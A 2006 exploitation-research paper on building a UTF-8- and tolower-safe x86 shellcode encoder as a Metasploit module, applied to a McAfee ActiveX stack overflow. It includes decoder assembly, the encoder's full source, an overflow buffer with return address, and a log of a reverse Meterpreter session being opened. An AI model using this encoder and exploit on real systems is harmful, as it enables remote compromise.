Zines/uninformed/5.1.txt

Implementing a Custom X86 Encoder
Aug, 2006
skape
mmiller@hick.org


1) Foreword

Abstract: This paper describes the process of implementing a custom
encoder for the x86 architecture. To help set the stage, the McAfee
Subscription Manager ActiveX control vulnerability, which was discovered
by eEye, will be used as an example of a vulnerability that requires the
implementation of a custom encoder.  In particular, this vulnerability
does not permit the use of uppercase characters.  To help make things
more interesting, the encoder described in this paper will also avoid
all characters above 0x7f.  This will make the encoder both UTF-8 safe
and tolower safe.

Challenge: The author believes that a UTF-8 safe and tolower safe
encoder could most likely be implemented in a much more optimized
fashion that incurs far less overhead in terms of size. If any reader
has ideas about ways in which this might be approached, feel free to
contact the author.  A bonus challenge would be to identify a geteip
technique that can be used with these character limitations.


2) Introduction

In the month of August, eEye released an advisory for a stack-based
buffer overflow that was found in the McAfee Subscription Manager
ActiveX control.  The underlying vulnerability was in an insecure call
to vsprintf that was exposed through scripting-accessible routines. At a
glance, this vulnerability would appear trivial to exploit given that
it's a very basic stack overflow.  However, once it comes to
transmitting a payload, or even a particular return address, certain
limiting factors begin to appear.  The focus of this paper will center
around an exercise in implementing a custom encoder to overcome certain
character set limitations. The McAfee Subscription Manager vulnerability
will be used as a real-world example of a vulnerability that requires a
custom encoder to exploit.

When it comes to exploiting this vulnerability, the first step is to
reproduce the conditions reported in the advisory.  Like most
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
such as A's. However, in this particular exploit, sending a sequence of
A's, which equates to 0x41, actually causes the return address to be
overwritten with 0x61's which are lowercase a's. Judging from this, it
seems obvious that the input string is undergoing a tolower operation
and it will not be possible for the payload or return address to contain
any uppercase characters.

Given these character restrictions, it's safe to go forward with writing
the exploit.  To simply get a proof of concept for code execution, it
makes sense to put a series of int3's, represented by the 0xcc opcode,
immediately following the return address. The return address could then
be pointed to the location of a push esp / ret or some other type of
instruction that transfers control to where the series of int3's should
reside.  Once the vulnerability is triggered, the debugger should break
in at an int3 instruction, but that's not actually what happens.
Instead, it breaks in on a completely different instruction:


(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
eax=00000f19 ebx=00000000 ecx=00139438
edx=0013a384 esi=00001b58 edi=0013a080
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
0013a02c ec              in      al,dx
0:000> u eip
0013a02c ec              in      al,dx
0013a02d ec              in      al,dx
0013a02e ec              in      al,dx
0013a02f ec              in      al,dx


Again, it looks like the buffer is undergoing some sort of transformation.  One
quick thing to notice is that 0xcc + 0x20 = 0xec.  This is similar to what
would happen when changing an uppercase character to a lowercase character,
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20.  It
appears that the operation that's performing the case lowering may also be
inadvertently performing it on a specific high ASCII range.

What's actually occurring is that the subscription manager control is calling
mbslwr, using the statically linked CRT, on a copy of the original input
string.  Internally, mbslwr calls into crtLCMapStringA.  Eventually this will
lead to a call out to kernel32!LCMapStringW.  The second parameter to this
routine is dwMapFlags which describes what sort of transformations, if any,
should be performed on the buffer. The mbslwr routine passes 0x100, or
LCMAP_LOWERCASE.  This is what results in the lowering of the string.

So, given this information, it can be determined that it will not be possible
to use characters through and including 0x41 and 0x5A as well as, for the sake
of clarity, 0xc0 and 0xe0.  In actuality, not all of the characters in this
range are bad.  The main reason this ends up causing problems is because many
of the payload encoders out there for x86, including those in Metasploit, rely
on characters from these two sets for their decoder stub and subsequent encoded
data.  For that reason, and for the challenge, it's worth pursuing the
implementation of a custom encoder.

While this particular vulnerability will permit the use of many characters
above 0x80, it makes the challenge that much more interesting, and particulary
useful, to limit the usable character set to the characters described below.
The reason this range is more useful is because the characters are UTF-8 safe
and also tolower safe.  Like most good payloads, the encoder will also avoid
NULL bytes.


0x01 -> 0x40
0x5B -> 0x7f


As with all encoded formats, there are actually two major pieces involved. The
first part is the encoder itself.  The encoder is responsible for taking a raw
buffer and encoding it into the appropriate format. The second part is the
decoder, which, as is probably obvious, takes the encoded form and converts it
back into the raw form so that it can be executed as a payload.  The
implementation of these two pieces will be described in the following chapters.


3) Implementing the Decoder

The implementation of the decoder involves taking the encoded form and
converting it back into the raw form.  This must all be done using assembly
instructions that will execute natively on the target machine after an exploit
has succeeded and it must also use only those instructions that fall within the
valid character set. To accomplish this, it makes sense to figure out what
instructions are available out of the valid character set. To do that, it's as
simple as generating all of the permutations of the valid characters in both
the first and second byte positions. This provides a pretty good idea of what's
available.  The end-result of such a process is a list of about 105 unique
instructions (independent of operand types).  Of those instructions the most
interesting are listed below:


add
sub
imul
inc
cmp
jcc
pusha
push
pop
and
or
xor


Some very useful instructions are available, such as add, xor, push, pop, and a
few jcc's.  While there's an obvious lack of the traditional mov instruction,
it can be made up for through a series of push and pop instructions, if needed.
With the set of valid instructions identified, it's possible to begin
implementing the decoder.  Most decoders will involve three implementation
phases.  The first phase is used to determine the base address of the decoder
stub using a geteip technique.  Following that, the encoded data must be
transformed from its character-safe form to the form that it will actually
execute from.  Finally, the decoder must transfer control into the decoded data
so that the actual payload can begin executing.  These three steps will be
described in the following sections.

In order to better understand the following sections, it's important to
describe the general approach that is going to be taken to implement the
decoder.  The stub header is used to prepare the necessary state for the decode
transforms.  The transforms themselves take the encoded data, as a series of
four byte blocks, and translate it using the process described in section .
Finally, execution falls through to the decoded data that is stored in place of
the encoded data.


3.1) Determining the Stub's Base Address


The first step in most decoder stubs will require the use of a series of
instructions, also referred to as geteip code, that obtain the location of the
current instruction pointer. The reason this is necessary is because most
decoders will have the encoded data placed immediately following the decoder
stub in memory. In order to operate on the encoded data using an absolute
address, it is necessary to determine where the data is at.  If the decoder
stub can determine the address that it's executing from, then it can determine
the address of the encoded data immediately following it in memory in a
position-independent fashion. As one might expect, the character limitations of
this challenge make it quite a bit harder to get the value current instruction
pointer.

There are a number of different techniques that can be used to get the value of
the instruction pointer on x86. However, the majority of these techniques rely
on the use of the call instruction. The problem with the use of the call
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
or 0xff. Another technique that can be used to get the instruction pointer is
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
of bytes in the high ASCII range, such as 0xd9.  Yet another approach is to use
structured exception handling to get the instruction pointer. This is
accomplished by registering an exception handler and extracting the Eip value
from the CONTEXT structure when an exception is generated.  In fact, this
approach has even been implemented in entirely alphanumeric form for Windows by
SkyLined. Unfortunately, it can't be used in this case because it relies on
uppercase characters.

With all of the known geteip techniques unusable, it seems like some
alternative method for getting the base address of the decoder stub will be
needed.  In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
is common for the decoder stub to assume that a certain register contains the
base address of the decoder stub. This assumption makes the decoder more
complicated to use because it can't simply be dropped into any exploit and be
expected to work. Instead, exploits may need to be modified in order to ensure
that a register can be found that contains the location, or some location near,
the decoder stub.

At the time of this writing, the author is not aware of a geteip technique that
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
payloads, the decoder described in this paper will be implemented using a
register that is explicitly assumed to contain a reference to some address that
is near the base address of the decoder stub. For this document, the register
that is assumed to hold the address will be ecx, but it is equally possible to
use other registers.

For this particular decoder, determining the base address is just the first
step involved in implementing the stub's header.  Once the base address has
been determined, the decoder must adjust the register that holds the base
address to point to the location of the encoded data. The reason this is
necessary is because the next step of the decoder, the transforms, depend on
knowing the location of the encoded data that they will be operating on. In
order to calculate this address, the decoder must add the size of the stub
header plus the size of the all of the decode transforms to the register that
holds the base address. The end result should be that the register will hold
the address of the first encoded block.

The following disassembly shows one way that the stub header might be
implemented.  In this disassembly, ecx is assumed to point at the beginning of
the stub header:


00000000  6A12              push byte +0x12
00000002  6B3C240B          imul edi,[esp],byte +0xb
00000006  60                pusha
00000007  030C24            add ecx,[esp]
0000000A  6A19              push byte +0x19
0000000C  030C24            add ecx,[esp]
0000000F  6A04              push byte +0x4


The purpose of the first two instructions is to calculate the number of bytes
consumed by all of the decode transforms (which are described in section ).  It
accomplishes this by multiplying the size of each transform, which is 0xb
bytes, by the total number of transforms, which in this example 0x12.  The
result of the multiplication, 0xc6, is stored in edi.  Since each transform is
capable of decoding four bytes of the raw payload, the maximum number of bytes
that can be encoded is 508 bytes.  This shouldn't be seen as much of a limiting
factor, though, as other combinations of imul can be used to account for larger
payloads.

Once the size of the decode transforms has been calculated, pusha is executed
in order to place the edi register at the top of the stack.  With the value of
edi at the top of the stack, the value can be added to the base address
register ecx, thus accounting for the number of bytes used by the decode
transforms.  The astute reader might ask why the value of edi is indirectly
added to ecx.  Why not just add it directly?  The answer, of course, is due to
bad characters:


00000000  01F9              add ecx,edi


It's also not possible to simply push edi onto the stack, because the push edi
instruction also contains bad characters:


00000000  57                push edi


Starting with the fifth instruction, the size of the stub header, plus any
other offsets that may need to be accounted for, are added to the base address
in order to shift the ecx register to point at the start of the encoded data.
This is accomplished by simply pushing the the number of bytes to add onto the
stack and then adding them to the ecx register indirectly by adding through
[esp].

After these instructions are finished, ecx will point to the start of the
encoded data. The final instruction in the stub header is a push byte 0x4. This
instruction isn't actually used by the stub header, but it's there to set up
some necessary state that will be used by the decode transforms.  It's use will
be described in the next section.


3.2) Transforming the Encoded Data

The most important part of any decoder is the way in which it transforms the
data from its encoded form to its actual form.  For example, many of the
decoders used in the Metasploit Framework and elsewhere will xor a portion of
the encoded data with a key that results in the actual bytes of the original
payload being produced.  While this an effective way of obtaining the desired
results, it's not possible to use such a technique with the character set
limitations currently defined in this paper.

In order to transform encoded data back to its original form, it must be
possible to produce any byte from 0x00 to 0xff using any number of combinations
of bytes that fall within the valid character set.  This means that this
decoder will be limited to using combinations of character that fall within
0x01-0x40 and 0x5b-0x7f.  To figure out the best possible means of
accomplishing the transformation, it makes sense to investigate each of the
useful instructions that were identified earlier in this chapter.

The bitwise instructions, such as and, or, and xor are not going to be
particularly useful to this decoder.  The main reason for this is that they are
unable to produce values that reside outside of the valid character sets
without the aide of a bit shifting instruction. For example, it is impossible
to bitwise-and two non-zero values in the valid character set together to
produce 0x00. While xor could be used to accomplish this, that's about all that
it could do other than producing other values below the 0x80 boundary.  These
restrictions make the bitwise instructions unusable.

The imul instruction could be useful in that it is possible to multiply two
characters from the valid character set together to produce values that reside
outside of the valid character set.  For example, multiplying 0x02 by 0x7f
produces 0xfe.  While this may have its uses, there are two remaining
instructions that are actually the most useful.

The add instruction can be used to produce almost all possible characters.
However, it's unable to produce a few specific values.  For example, it's
impossible to add two valid characters together to produce 0x00. It is also
impossible to add two valid characters together to produce 0xff and 0x01.
While this limitation may make it appear that the add instruction is unusable,
its saving grace is the sub instruction.

Like the add instruction, the sub instruction is capable of producing almost
all possible characters.  It is certainly capable of producing the values that
add cannot.  For example, it can produce 0x00 by subtracting 0x02 from 0x02.
It can also produce 0xff by subtracting 0x03 from 0x02.  Finally, 0x01 can be
produce by subtracting 0x02 from 0x03.  However, like the add instruction,
there are also characters that the sub instruction cannot produce.   These
characters include 0x7f, 0x80, and 0x81.

Given this analysis, it seems that using add and sub in combination is most
likely going to be the best choice when it comes to transforming encoded data
for this decoder.  With the fundamental operations selected, the next step is
to attempt to implement the code that actually performs the transformation.  In
most decoders, the transform will be accomplished through a loop that simply
performs the same operation on a pointer that is incremented by a set number of
bytes each iteration.  This type of approach results in all of the encoded data
being decoded prior to executing it.  Using this type of technique is a little
bit more complicated for this decoder, though, because it can't simply rely on
the use of a static key and it's also limited in terms of what instructions it
can use within the loop.

For these reasons, the author decided to go with an alternative technique for
the transformation portion of the decoder stub. Rather than using a loop that
iterates over the encoded data, the author chose to use a series of sequential
transformations where each block of the encoded data was decoded.  This
technique has been used before in similar situations.  One negative aspect of
using this approach over a loop-based approach is that it substantially
increases the size of the encoded payload.  While figure gives an idea of the
structure of the decoder, it doesn't give a concrete understanding of how it's
actually implemented.  It's at this point that one must descend from the lofty
high-level.  What better way to do this than diving right into the disassembly?


00000011  6830703C14        push dword 0x143c7030
00000016  5F                pop edi
00000017  0139              add [ecx],edi
00000019  030C24            add ecx,[esp]


The form of each transform will look exactly like this one.  What's actually
occurring is a four byte value is pushed onto the stack and then popped into
the edi register.  This is done in place of a mov instruction because the mov
instruction contains invalid characters.  Once the value is in the edi
register, it is either added to or subtracted from its respective encoded data
block.  The result of the add or subtract is stored in place of the previously
encoded data.  Once the transform has completed, it adds the value at the top
of the stack, which was set to 0x4 in the decoder stub header, to the register
that holds the pointer into the encoded data.  This results in the pointer
moving on to the next encoded data block so that the subsequent transform will
operate on the correct block.

This simple process is all that's necessary to perform the transformations
using only valid characters.  As mentioned above, one of the negative aspects
of this approach is that it does add quite a bit of overhead to the original
payload.  For each four byte block, 11 bytes of overhead are added.  The
approach is also limited by the fact that if there is ever a portion of the raw
payload that contains characters that add cannot handle, such as 0x00, and also
contains characters that sub cannot handle, such as 0x80, then it will not be
possible to encode it.


3.3) Transferring Control to the Decoded Data

Due to the way the decoder is structured, there is no need for it to include
code that directly transfers control to the decoded data.  Since this decoder
does not use any sort of looping, execution control will simply fall through to
the decoded data after all of the transformations have completed.


4) Implementing the Encoder

The encoder portion is made up of code that runs on an attacker's machine prior
to exploiting a target.  It converts the actual payload that will be executed
into the encoded format and then transmits the encoded form as the payload.
Once the target begins executing code, the decoder, as described in chapter ,
converts the encoded payload back into its raw form and then executes it.

For the purposes of this document, the client-side encoder was implemented in
the 3.0 version of the Metasploit Framework as an encoder module for x86.  This
chapter will describe what was actually involved in implementing the encoder
module for the Metasploit Framework.

The very first step involved in implementing the encoder is to create the
appropriate file and set up the class so that it can be loaded into the
framework.  This is accomplished by placing the encoder module's file in the
appropriate directory, which in this case is modules/encoders/x86.  The name of
the module's file is important only in that the module's reference name is
derived from the filename.  For example, this encoder can be referenced as
x86/avoidutf8tolower based on its filename.  In this case, the module's
filename is avoidutf8tolower.rb. Once the file is created in the appropriate
location, the next step is to define the class and provide the framework with
the appropriate module information.

To define the class, it must be placed in the appropriate namespace that
reflects where it is at on the filesystem.  In this case, the module is placed
in the Msf::Encoders::X86 namespace.  The name of the class itself is not
important so long as it is unique within the namespace.  When defining the
class, it is important that it inherit from the Msf::Encoder base class at some
level.  This ensures that it implements all the required methods for an encoder
to function when the framework is interacting with it.

At this point, the class definition should look something like this:


require 'msf/core'

module Msf
module Encoders
module X86

class AvoidUtf8 < Msf::Encoder

end

end
end
end


With the class defined, the next step is to create a constructor and to pass
the appropriate module information down to the base class in the form of the
info hash.  This hash contains information about the module, such as name,
version, authorship, and so on.  For encoder modules, it also conveys
information about the type of encoder that's being implemented as well as
information specific to the encoder, like block size and key size.  For this
module, the constructor might look something like this:


def initialize
   super(
      'Name'             => 'Avoid UTF8/tolower',
      'Version'          => '$Revision: 1.3 $',
      'Description'      => 'UTF8 Safe, tolower Safe Encoder',
      'Author'           => 'skape',
      'Arch'             => ARCH_X86,
      'License'          => MSF_LICENSE,
      'EncoderType'      => Msf::Encoder::Type::NonUpperUtf8Safe,
      'Decoder'          =>
         {
            'KeySize'    => 4,
            'BlockSize'  => 4,
         })
end


With all of the boilerplate code out of the way, it's time to finally get into
implementing the actual encoder.  When implementing encoder modules in the 3.0
version of the Metasploit Framework, there are a few key methods that can
overridden by a derived class.  These methods are described in detail in the
developer's guide, so an abbreviated explanation of only those useful to this
encoder will be given here.  Each method will be explained in its own
individual section.

4.1) decoder_stub

First and foremost, the decoderstub method gives an encoder module the
opportunity to dynamically generate a decoder stub.  The framework's idea of
the decoder stub is equivalent to the stub header described in chapter .  In
this case, it must simply provide a buffer whose assembly will set up a
specific register to point to the start of the encoded data blocks as described
in section .  The completed version of this method might look something like
this:


def decoder_stub(state)
   len = ((state.buf.length + 3) & (~0x3)) / 4

   off = (datastore['BufferOffset'] || 0).to_i

   decoder =
      "\x6a" + [len].pack('C')      +  # push len
      "\x6b\x3c\x24\x0b"            +  # imul 0xb
      "\x60"                        +  # pusha
      "\x03\x0c\x24"                +  # add ecx, [esp]
      "\x6a" + [0x11+off].pack('C') +  # push byte 0x11 + off
      "\x03\x0c\x24"                +  # add ecx, [esp]
      "\x6a\x04"                       # push byte 0x4

   state.context = ''

   return decoder
end


In this routine, the length of the raw buffer, as found through
state.buf.length, is aligned up to a four byte boundary and then divided by
four. Following that, an optional buffer offset is stored in the off local
variable.  The purpose of the BufferOffset optional value is to allow exploits
to cause the encoder to account for extra size overhead in the ecx register
when doing its calculations.  The decoder stub is then generated using the
calculated length and offset to produce the stub header.  The stub header is
then returned to the caller.


4.2) encode_block

The next important method to override is the encode_block method.  This method
is used by the framework to allow an encoder to encode a single block and
return the resultant encoded buffer.  The size of each block is provided to the
framework through the encoder's information hash.  For this particular encoder,
the block size is four bytes. The implementation of the encode_block routine is
as simple as trying to encode the block using either the add instruction or the
sub instruction.  Which instruction is used will depend on the bytes in the
block that is being encoded.


def encode_block(state, block)
   buf = try_add(state, block)

   if (buf.nil?)
      buf = try_sub(state, block)
   end

   if (buf.nil?)
      raise BadcharError.new(state.encoded, 0, 0, 0)
   end

   buf
end


The first thing encode_block tries is add.  The try_add method is implemented as
shown below:


def try_add(state, block)
   buf  = "\x68"
   vbuf = ''
   ctx  = ''

   block.each_byte { |b|
      return nil if (b == 0xff or b == 0x01 or b == 0x00)

      begin
         xv = rand(b - 1) + 1
      end while (is_badchar(state, xv) or is_badchar(state, b - xv))

      vbuf += [xv].pack('C')
      ctx  += [b - xv].pack('C')
   }

   buf += vbuf + "\x5f\x01\x39\x03\x0c\x24"

   state.context += ctx

   return buf
end


The try_add routine enumerates each byte in the block, trying to find a random
byte that, when added to another random byte, produces the byte value in the
block.  The algorithm it uses to accomplish this is to loop selecting a random
value between 1 and the actual value.  From there a check is made to ensure
that both values are within the valid character set.  If they are both valid,
then one of the values is stored as one of the bytes of the 32-bit immediate
operand to the push instruction that is part of the decode transform for the
current block.  The second value is appended to the encoded block context.
After all bytes have been considered, the instructions that compose the decode
transform are completed and the encoded block context is appended to the string
of encoded blocks.  Finally, the decode transform is returned to the framework.

In the event that any of the bytes that compose the block being encoded by
try_add are 0x00, 0x01, or 0xff, the routine will return nil.  When this
happens, the encode_block routine will attempt to encode the block using the sub
instruction.  The implementation of the try_sub routine is shown below:


def try_sub(state, block)
   buf   = "\x68";
   vbuf  = ''
   ctx   = ''
   carry = 0

   block.each_byte { |b|
      return nil if (b == 0x80 or b == 0x81 or b == 0x7f)

      x          = 0
      y          = 0
      prev_carry = carry

      begin
         carry = prev_carry

         if (b > 0x80)
            diff  = 0x100 - b
            y     = rand(0x80 - diff - 1).to_i + 1
            x     = (0x100 - (b - y + carry))
            carry = 1
         else
            diff  = 0x7f - b
            x     = rand(diff - 1) + 1
            y     = (b + x + carry) & 0xff
            carry = 0
         end

      end while (is_badchar(state, x) or is_badchar(state, y))

      vbuf += [x].pack('C')
      ctx  += [y].pack('C')
   }

   buf += vbuf + "\x5f\x29\x39\x03\x0c\x24"

   state.context += ctx

   return buf
end


Unlike the try_add routine, the try_sub routine is a little bit more
complicated, perhaps unnecessarily.  The main reason for this is that
subtracting two 32-bit values has to take into account things like carrying
from one digit to another.  The basic idea is the same.  Each byte in the block
is enumerated.  If the byte is above 0x80, the routine calculates the
difference between 0x100 and the byte.  From there, it calculates the y value
as a random number between 1 and 0x80 minus the difference.  Using the y value,
it generates the x value as 0x100 minus the byte value minus y plus the current
carry flag.  To better understand this, consider the following scenario.

Say that the byte being encoded is 0x84.  The difference between 0x100 and 0x84
is 0x7c.  A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c -
1) + 1. Given this value for y, the value of x would be, assuming a zero carry
flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84.

However, if the byte value is less than 0x80, then a different method is used
to select the x and y values.  In this case, the difference is calculated as
0x7f minus the value of the current byte.  The value of x is then assigned a
random value between 1 and the difference.  The value of y is then calculated
as the current byte plus x plus the carry flag.  For example, if the value is
0x24, then the values could be calculated as described in the following
scenario.

First, the difference between 0x7f and 0x24 is 0x5b.  The value of x could be
0x18, as derived from rand(0x5b - 1) + 1.  From there, the value of y would be
calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24.

Given these two methods of calculating the individual byte values, it's
possible to encode all byte with the exception of 0x7f, 0x80, and 0x81.  If any
one of these three bytes is encountered, the try_sub routine will return nil
and the encoding will fail.  Otherwise, the routine will complete in a fashion
similar to the try_add routine.  However, rather than using an add instruction,
it uses the sub instruction.

4.3) encode_end


With all the encoding cruft out of the way, the final method that needs to be
overridden is encode_end.  In this method, the state.context attribute is
appended to the state.encoded.  The purpose of the state.context attribute is
to hold all of the encoded data blocks that are created over the course of
encoding each block.  The state.encoded attribute is the actual decoder
including the stub header, the decode transformations, and finally, the encoded
data blocks.


def encode_end(state)
   state.encoded += state.context
end


Once encoding completes, the result might be a disassembly that looks something
like this:


$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc"  | \
  ./msfencode -e x86/avoid_utf8_tolower -t raw | \
  ndisasm -u -
[*] x86/avoid_utf8_tolower succeeded, final size 47

00000000  6A02              push byte +0x2
00000002  6B3C240B          imul edi,[esp],byte +0xb
00000006  60                pusha
00000007  030C24            add ecx,[esp]
0000000A  6A11              push byte +0x11
0000000C  030C24            add ecx,[esp]
0000000F  6A04              push byte +0x4
00000011  683C0C190D        push dword 0xd190c3c
00000016  5F                pop edi
00000017  0139              add [ecx],edi
00000019  030C24            add ecx,[esp]
0000001C  68696A6060        push dword 0x60606a69
00000021  5F                pop edi
00000022  0139              add [ecx],edi
00000024  030C24            add ecx,[esp]
00000027  06                push es
00000028  1467              adc al,0x67
0000002A  6B63626C          imul esp,[ebx+0x62],byte +0x6c
0000002E  6C                insb


5) Applying the Encoder

The whole reason that this encoder was originally needed was to take advantage
of the vulnerability in the McAfee Subscription Manager ActiveX control.  Now
that the encoder has been implemented, all that's left is to try it out and see
if it works.  To test this against a Windows XP SP0 target, the overflow buffer
might be constructed as follows.

First, a string of 2972 random text characters must be generated.  The return
address should follow the random character string.  An example of a valid
return address for this target is 0x7605122f which is the location of a jmp esp
instruction in shell32.dll. Immediately following the return address in the
overflow buffer should be a series of five instructions:


00000000  60                pusha
00000001  6A01              push byte +0x1
00000003  6A01              push byte +0x1
00000005  6A01              push byte +0x1
00000007  61                popa


The purpose of this series of instructions is to cause the value of esp at the
time that the pusha occurs to be popped into the ecx register.  As the reader
should recall, the ecx register is used as the base address for the decoder
stub.  However, since esp doesn't actually point to the base address of the
decoder stub, the encoder must be informed that 8 extra bytes must be added to
ecx when accounting for the extra offset into the encoded data blocks.  This is
conveyed by setting the BufferOffset value to 8.  After these five instructions
should come the encoded version of the payload.  To better visualize this,
consider the following snippet from the exploit:


buf =
   Rex::Text.rand_text(2972, payload_badchars) +
   [ ret ].pack('V') +
   "\x60" + # pusha
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
   "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1
   "\x61" + # popa
   p.encoded


With the overflow buffer ready to go, the only thing left to do is fire off the
an exploit attempt by having the machine browse to the malicious website:


msf exploit(mcafee_mcsubmgr_vsprintf) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.3:8080/foo
[*] Server started.
[*] Exploit running as background job.
msf exploit(mcafee_mcsubmgr_vsprintf) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010)

msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >


6) Conclusion

The purpose of this paper was to illustrate the process of implementing a
customer encoder for the x86 architecture.  In particular, the encoder
described in this paper was designed to make it possible to encode payloads in
a UTF-8 and tolower safe format. To help illustrate the usefulness of such an
encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX
control was used because of its restrictions on uppercase characters.  While
many readers may never find it necessary to implement an encoder, it's
nevertheless a necessary topic to understand for those who are interested in
exploitation research.


A. References

eEye.  McAfee Subscription Manager Stack Buffer Overflow.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html;
accessed Aug 26, 2006.


Metasploit Staff. Metasploit 3.0 Developer's Guide.
http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf;
 accessed Aug 26, 2006.


Spoonm.  Recent Shellcode Developments.
http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf;
accessed Aug 26, 2006.


SkyLined. Alpha 2.
http://www.edup.tudelft.nl/ bjwever/documentation_alpha2.html.php;
accessed Aug 26, 2006.